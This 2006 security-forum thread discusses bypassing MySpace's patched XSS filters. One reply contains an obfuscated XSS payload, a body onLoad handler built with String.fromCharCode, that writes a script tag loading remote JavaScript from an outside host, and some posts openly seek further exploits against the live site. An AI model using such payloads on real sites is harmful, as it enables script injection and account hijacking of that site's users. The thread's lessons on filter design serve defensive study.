Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace again, again.
Posted by: eyeced
Date: December 22, 2006 12:48PM

Well people, it was patched earlier today. And ive been looking at it for about an hour, its killed me. They seem to have understood the hole and patched it this time. Ive tried some pretty crazy xss evasion and there is no way possible (yet) to connect onload and = together this time.

If anyone does find an exploit for this, please post here, as my i owe it to myself to find out! This ones got me stumped, i got annoyed with it, so i started posting in so it begins instead... beside the point, anyway reply with information if you anyone has managed to circumvent the new filters. There outrageous!

Options: ReplyQuote
Re: Myspace again, again.
Posted by: kuza55
Date: December 23, 2006 06:07PM

Here you go: [kuza55.blogspot.com]

Yet another MySpace exploit, at the speed these are coming out, you've got to wonder how the MySpace team must be feeling.

Options: ReplyQuote
Re: Myspace again, again.
Posted by: maluc
Date: December 23, 2006 11:56PM

very clever kuza.. i like it alot. it goes to show how a hodgepodge of filters can cause some.. unforseen side effects from their interactions.

-maluc

Options: ReplyQuote
Re: Myspace again, again.
Posted by: rsnake
Date: December 24, 2006 04:23PM

This is the exact reason you need to use a while loop when you are doing stripping/modification of user input. Just like Forest Gump might have once said, "XSS Filtering is like a box of chocolates. You never know what you're going to get."

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Myspace again, again.
Posted by: maluc
Date: December 24, 2006 05:16PM

indeed, while looping is one of the first things you should learn about filtering =.=

-maluc

Options: ReplyQuote
Re: Myspace again, again.
Posted by: Kyran
Date: December 25, 2006 02:47AM

MySpace, XSS and Forest Gump?

I thought something more appropriate would be "Stupid is as stupid does."

- Kyran

Options: ReplyQuote
Re: Myspace again, again.
Posted by: digi7al64
Date: December 25, 2006 06:13AM

nice find indeed.

It would also appear that you can use the document.write with string.fromcharcode function to add remote js to bypass the "script" filter... but i gues most people already know this

<body onLoadmoz-binding="document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,104,97,46,99,107,101,114,115,46,111,114,103,47,115,46,106,115,62,60,47,115,99,114,105,112,116,62));">

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace again, again.
Posted by: OrbityBaby
Date: January 11, 2007 12:15PM

eyeced Wrote:
-------------------------------------------------------
> Well people, it was patched earlier today. And ive
> been looking at it for about an hour, its killed
> me. They seem to have understood the hole and
> patched it this time. Ive tried some pretty crazy
> xss evasion and there is no way possible (yet) to
> connect onload and = together this time.
>
> If anyone does find an exploit for this, please
> post here, as my i owe it to myself to find out!
> This ones got me stumped, i got annoyed with it,
> so i started posting in so it begins instead...
> beside the point, anyway reply with information if
> you anyone has managed to circumvent the new
> filters. There outrageous!


Looks like they fixed this again "for good" - LOL. Anyone have any ideas of an exploit to connect onload and = together on MySpace?

Options: ReplyQuote


Sorry, only registered users may post in this forum.